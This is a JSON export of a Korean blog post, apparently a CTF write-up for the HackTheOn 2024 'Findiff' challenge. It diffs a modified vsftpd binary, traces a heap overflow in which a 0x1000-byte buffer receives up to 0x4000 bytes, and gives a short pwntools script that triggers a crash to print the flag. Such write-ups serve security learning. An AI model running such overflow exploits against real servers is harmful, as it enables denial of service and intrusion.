{"id":3367,"date":"2025-04-20T17:54:06","date_gmt":"2025-04-20T08:54:06","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3367"},"modified":"2025-04-20T17:54:37","modified_gmt":"2025-04-20T08:54:37","slug":"%ed%95%b5%ed%85%8c%ec%98%a82024-findiff","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3367","title":{"rendered":"[\ud575\ud14c\uc628 2024] Findiff"},"content":{"rendered":"\n
\"\"<\/figure>\n\n\n\n

Bindiff<\/h3>\n\n\n\n

vsftpd<\/strong> vs vvsftpd<\/strong><\/p>\n\n\n\n

vsftpd\ub294 \uc6d0\ubcf8 ftp \uc11c\ubc84 \ubc14\uc774\ub108\ub9ac \ud30c\uc77c, vvsftpd\ub294 \uc218\uc815\ub41c ftp \uc11c\ubc84 \ubc14\uc774\ub108\ub9ac \ud30c\uc77c\ub85c \ubcf4\uc778\ub2e4.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\uc218\uc815\ub41c vvsftpd init_connection \ud568\uc218\ub97c \uc0b4\ud3b4\ubcf4\uba74, \uccab\uc904\uc5d0 \ub2e4\uc74c \ucf54\ub4dc\uac00 \ucd94\uac00\ub418\uc788\ub2e4.<\/p>\n\n\n\n

    \n
  • 11 = SIGSEGV (segmantation fault)<\/strong><\/li>\n<\/ul>\n\n\n\n
    signal(11, (__sighandler_t)getFlag);<\/pre>\n\n\n\n
      \n
    • getFlag(): flag \ucd9c\ub825<\/li>\n<\/ul>\n\n\n\n
      void __cdecl __noreturn getFlag()\n{\n  int fd; \/\/ [rsp+Ch] [rbp-34h]\n  char flag[40]; \/\/ [rsp+10h] [rbp-30h] BYREF\n  unsigned __int64 v2; \/\/ [rsp+38h] [rbp-8h]\n\n  v2 = __readfsqword(0x28u);\n  fd = open(\"flag\", 0);\n  memset(flag, 0, 32);\n  read(fd, flag, 0x20u);\n  printf(\"500 OOPS: %s\\n\", flag);\n  exit(1);\n}<\/pre>\n\n\n\n
      \ubb38\uc81c\uc11c\ubc84 \ud658\uacbd \uad6c\ucd95<\/h3>\n\n\n\n
      strace\ub97c \ud1b5\ud574 vvsftpd \ubc14\uc774\ub108\ub9ac\ub97c \uc2e4\ud589\uc2dc\ud0a4\uba74, \/etc\/vsftpd.conf \ud30c\uc77c\uc744 \ubd88\ub7ec\uc624\uae30 \ub54c\ubb38\uc5d0 
      \ubb38\uc81c\ud30c\uc77c\uc5d0\uc11c \uc81c\uacf5\ub41c vvsftpd.conf\uc744 \uac70\uae30\ub2e4 \ubcf5\ubd99\ud574\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
      ubuntu@2d0f4d9a440c:~\/hto2024\/findiff$ sudo strace .\/vvsftpd\n...\nnewfstatat(AT_FDCWD, \"\/etc\/vsftpd.conf\", 0x603123e264c0, 0) = -1 ENOENT (No such file or directory)\n...<\/pre>\n\n\n\n
      vvsftpd.conf<\/h3>\n\n\n\n
        \n
      • anonymous \ub85c\uadf8\uc778 \uac00\ub2a5<\/li>\n<\/ul>\n\n\n\n
        listen=YES\nseccomp_sandbox=NO\none_process_model=YES\n\n# User management\nanonymous_enable=YES\nno_anon_password=YES\nnopriv_user=nobody\nftp_username=nobody\n\n# Permissions\nconnect_from_port_20=NO\nrun_as_launching_user=YES\nlisten_port=5000\n#anon_mkdir_write_enable=YES\nanon_root=\/tmp\/ftp\n\n# Filesystem interactions\nwrite_enable=YES\ndownload_enable=NO<\/pre>\n\n\n\n
        Analysis<\/h3>\n\n\n\n
        5000 \ud3ec\ud2b8\uc5d0 \uc811\uc18d\ud558\uace0 \uc544\ubb34 \ubb38\uc790\ub97c \uc785\ub825\ud558\uba74, \u201d530 Please login with USER and PASS.\u201d<\/strong> \ubb38\uc790\uc5f4\uc744 \ucd9c\ub825\ud55c\ub2e4. 
        \uc5ed\ucc38\uc870\ud574\uc11c \ub530\ub77c\uac00\ubcf4\uc790<\/p>\n\n\n\n
        ubuntu@2d0f4d9a440c:~\/hto2024\/findiff$ nc 127.0.0.1 5000\n220 (vvsFTPd 3.1.3.3.7)\ns\n530 Please login with USER and PASS.<\/pre>\n\n\n\n
        \ud574\ub2f9 \ubb38\uc790\uc5f4\uc740 parse_username_password \ud568\uc218\uc5d0\uc11c \ucc38\uc870\ub418\uace0 \uc788\uc5c8\ub2e4. 
        \uc5ec\uae30\uc11c \u201cUSER\u201d\ub97c \ucee4\ub9e8\ub4dc\ub85c \ubc1b\uace0, arg\ub294 \ucee4\ub9e8\ub4dc \ub744\uc5b4\uc4f0\uae30 \uc774\ud6c4\ub97c \uac00\ub9ac\ud0a8\ub2e4.<\/p>\n\n\n\n
        void __cdecl __noreturn parse_username_password(vsf_session *p_sess)\n{\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      vsf_cmdio_get_cmd_and_arg(p_sess, &p_sess->ftp_cmd_str, &p_sess->ftp_arg_str, 1);\n      if ( !tunable_ftp_enable )\n        break;\n      if ( str_equal_text((const mystr_0 *)&p_sess->ftp_cmd_str, \"USER\") )\n      {\n        handle_user_command(p_sess);\n      }\n      ...<\/pre>\n\n\n\n
        USER ABCD\ub97c \ub123\uc5c8\uc744\ub584, anonymous\ub85c\ub9cc \ub85c\uadf8\uc778 \uac00\ub2a5\ud558\ub2e4\uace0 \ub72c\ub2e4.<\/p>\n\n\n\n
        ubuntu@2d0f4d9a440c:~\/hto2024\/findiff$ nc 127.0.0.1 5000\n220 (vvsFTPd 3.1.3.3.7)\nUSER ABCD\n530 This FTP server is anonymous only.<\/pre>\n\n\n\n
        USER anonymous\ub97c \ub123\uc5c8\uc744\ub54c, \ub85c\uadf8\uc778\uc5d0 \uc131\uacf5\ud55c\ub2e4.<\/p>\n\n\n\n
        ubuntu@2d0f4d9a440c:~\/hto2024\/findiff$ nc 127.0.0.1 5000\n220 (vvsFTPd 3.1.3.3.7)\nUSER anonymous\n230 Login successful.<\/pre>\n\n\n\n
        \uadfc\ub370 \uc0ac\uc2e4\uc0c1, \ubb38\uc81c\uc810\uc740 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n
        \ub9e8 \ucc98\uc74c\uc5d0 init_connection<\/code> \uc5d0 \uc758\ud574 parse_username_password<\/code> \ud568\uc218\ub97c \ud638\ucd9c\ud55c\ub2e4. 
        \uc774\ud6c4 vsf_cmdio_get_cmd_and_arg<\/code>, control_getline<\/code> \ucc28\ub840\ub85c \ud638\ucd9c\ub418\ub294\ub370, 
        \uc5ec\uae30\uc11c control_getline<\/code> \uc5d0\uc11c vsf_secbuf_alloc(&p_sess->p_control_line_buf, 0x1000u);<\/code> \uc5d0 \uc758\ud574 \ucee4\ub9e8\ub4dc \ub77c\uc778 \ubc84\ud37c\uc778 p_sess->p_control_line_buf<\/code>\ub97c 0x1000\ub9cc\ud07c \ud560\ub2f9\ubc1b\uc9c0\ub9cc,
        str_netfd_alloc<\/code> \ud638\ucd9c\ud560\ub54c, \ub9e4\uac1c\ubcc0\uc218\uac00 0x4000\uc73c\ub85c \ub118\uaca8\uc838 \uc785\ub825\ubc1b\uc744 \ud06c\uae30\uac00 \ud6e8\uc52c \ub9ce\uc544 \ud799 \ubc84\ud37c\uc624\ubc84\ud50c\ub85c\uc6b0\uac00 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n
        void __cdecl __noreturn init_connection(vsf_session *p_sess)\n{\n  signal(11, (__sighandler_t)getFlag);\n  if ( tunable_setproctitle_enable )\n    vsf_sysutil_setproctitle(\"not logged in\");\n  vsf_cmdio_set_alarm(p_sess);\n  check_limits(p_sess);\n  if ( tunable_ssl_enable && tunable_implicit_ssl )\n    ssl_control_handshake(p_sess);\n  if ( tunable_ftp_enable )\n    emit_greeting(p_sess);\n  parse_username_password(p_sess);\n}<\/pre>\n\n\n\n
        void __cdecl __noreturn parse_username_password(vsf_session *p_sess)\n{\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      vsf_cmdio_get_cmd_and_arg(p_sess, &p_sess->ftp_cmd_str, &p_sess->ftp_arg_str, 1);\n      ...<\/pre>\n\n\n\n
        void __cdecl vsf_cmdio_get_cmd_and_arg(vsf_session *p_sess, mystr *p_cmd_str, mystr *p_arg_str, int set_alarm)\n{\n  int ret; \/\/ [rsp+2Ch] [rbp-4h]\n\n  if ( set_alarm )\n    vsf_cmdio_set_alarm(p_sess);\n  ret = control_getline(p_cmd_str, p_sess);<\/pre>\n\n\n\n
        int __cdecl control_getline(mystr *p_str, vsf_session *p_sess)\n{\n  unsigned int len; \/\/ [rsp+18h] [rbp-8h]\n  int ret; \/\/ [rsp+1Ch] [rbp-4h]\n\n  if ( !p_sess->p_control_line_buf )\n    vsf_secbuf_alloc(&p_sess->p_control_line_buf, 0x1000u);\n  ret = ftp_getline(p_sess, p_str, p_sess->p_control_line_buf);\n  if ( !ret )\n    return 0;\n  if ( ret < 0 )\n    vsf_cmdio_write_exit(p_sess, 500, \"Input line too long.\", 1);\n  str_replace_char((mystr_0 *)p_str, 0, 10);\n  for ( len = str_getlen((const mystr_0 *)p_str); len && str_get_char_at((const mystr_0 *)p_str, len - 1) == 13; --len )\n    str_trunc((mystr_0 *)p_str, len - 1);\n  return 1;\n}<\/pre>\n\n\n\n
        int __cdecl ftp_getline(vsf_session *p_sess, mystr *p_str, char *p_buf)\n{\n  int ret; \/\/ [rsp+2Ch] [rbp-14h]\n  int (*p_peek)(vsf_session *, char *, unsigned int); \/\/ [rsp+30h] [rbp-10h]\n  int (*p_read)(vsf_session *, char *, unsigned int); \/\/ [rsp+38h] [rbp-8h]\n\n  if ( p_sess->control_use_ssl && p_sess->ssl_slave_active )\n  {\n    priv_sock_send_cmd(p_sess->ssl_consumer_fd, 4);\n    ret = priv_sock_get_int(p_sess->ssl_consumer_fd);\n    if ( ret >= 0 )\n      priv_sock_get_str(p_sess->ssl_consumer_fd, p_str);\n    return ret;\n  }\n  else\n  {\n    p_peek = (int (*)(vsf_session *, char *, unsigned int))plain_peek_adapter;\n    p_read = (int (*)(vsf_session *, char *, unsigned int))plain_read_adapter;\n    if ( p_sess->control_use_ssl )\n    {\n      p_peek = (int (*)(vsf_session *, char *, unsigned int))ssl_peek_adapter;\n      p_read = (int (*)(vsf_session *, char *, unsigned int))ssl_read_adapter;\n    }\n    return str_netfd_alloc(p_sess, p_str, 10, p_buf, 0x4000u, p_peek, p_read);\n  }\n}<\/pre>\n\n\n\n
        int __cdecl str_netfd_alloc(\n        vsf_session *p_sess,\n        mystr *p_str,\n        char term,\n        char *p_readbuf,\n        unsigned int maxlen,\n        str_netfd_read_t p_peekfunc,\n        str_netfd_read_t p_readfunc)\n{\n  unsigned int i; \/\/ [rsp+38h] [rbp-18h]\n  unsigned int ia; \/\/ [rsp+38h] [rbp-18h]\n  unsigned int left; \/\/ [rsp+3Ch] [rbp-14h]\n  unsigned int retval; \/\/ [rsp+40h] [rbp-10h]\n  int retvala; \/\/ [rsp+40h] [rbp-10h]\n  int retvalb; \/\/ [rsp+40h] [rbp-10h]\n  unsigned int bytes_read; \/\/ [rsp+44h] [rbp-Ch]\n  char *p_readpos; \/\/ [rsp+48h] [rbp-8h]\n\n  p_readpos = p_readbuf;\n  left = maxlen;\n  str_empty((mystr_0 *)p_str);\nLABEL_2:\n  if ( &p_readpos[left] != &p_readbuf[maxlen] )<\/pre>\n\n\n\n
        solve.py<\/h3>\n\n\n\n
        \ud799 \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ucf1c 11 = SIGSEGV (segmantation fault) \uc2dc\uadf8\ub110 \ubc1c\uc0dd \uc720\ub3c4.<\/strong><\/p>\n\n\n\n
        from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = remote(\"127.0.0.1\", 5000)\n\np.sendline(b'A'*0x4000)\n\np.interactive()<\/pre>\n\n\n\n
        Result<\/h3>\n\n\n\n
        ubuntu@2d0f4d9a440c:~\/hto2024\/findiff$ python3 solve.py \n[+] Opening connection to 127.0.0.1 on port 5000: Done\n[*] Switching to interactive mode\n220 (vvsFTPd 3.1.3.3.7)\n500 OOPS: flag{fake_flag}\n\n[*] Got EOF while reading in interactive\n$  \n<\/pre>\n","protected":false},"excerpt":{"rendered":"
        Bindiff vsftpd vs vvsftpd vsftpd\ub294 \uc6d0\ubcf8 ftp \uc11c\ubc84 \ubc14\uc774\ub108\ub9ac \ud30c\uc77c, vvsftpd\ub294 \uc218\uc815\ub41c ftp \uc11c\ubc84 \ubc14\uc774\ub108\ub9ac \ud30c\uc77c\ub85c \ubcf4\uc778\ub2e4. \uc218\uc815\ub41c vvsftpd init_connection \ud568\uc218\ub97c \uc0b4\ud3b4\ubcf4\uba74, \uccab\uc904\uc5d0 \ub2e4\uc74c \ucf54\ub4dc\uac00 \ucd94\uac00\ub418\uc788\ub2e4. \ubb38\uc81c\uc11c\ubc84 \ud658\uacbd \uad6c\ucd95 strace\ub97c \ud1b5\ud574 vvsftpd \ubc14\uc774\ub108\ub9ac\ub97c \uc2e4\ud589\uc2dc\ud0a4\uba74, \/etc\/vsftpd.conf \ud30c\uc77c\uc744 \ubd88\ub7ec\uc624\uae30 \ub54c\ubb38\uc5d0 \ubb38\uc81c\ud30c\uc77c\uc5d0\uc11c \uc81c\uacf5\ub41c vvsftpd.conf\uc744 \uac70\uae30\ub2e4 \ubcf5\ubd99\ud574\uc8fc\uba74 \ub41c\ub2e4. vvsftpd.conf Analysis 5000 \ud3ec\ud2b8\uc5d0 \uc811\uc18d\ud558\uace0 \uc544\ubb34 \ubb38\uc790\ub97c \uc785\ub825\ud558\uba74, \u201d530 Please login… \ub354 \ubcf4\uae30 »[\ud575\ud14c\uc628 2024] Findiff<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3367","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3367"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3367\/revisions"}],"predecessor-version":[{"id":3371,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3367\/revisions\/3371"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}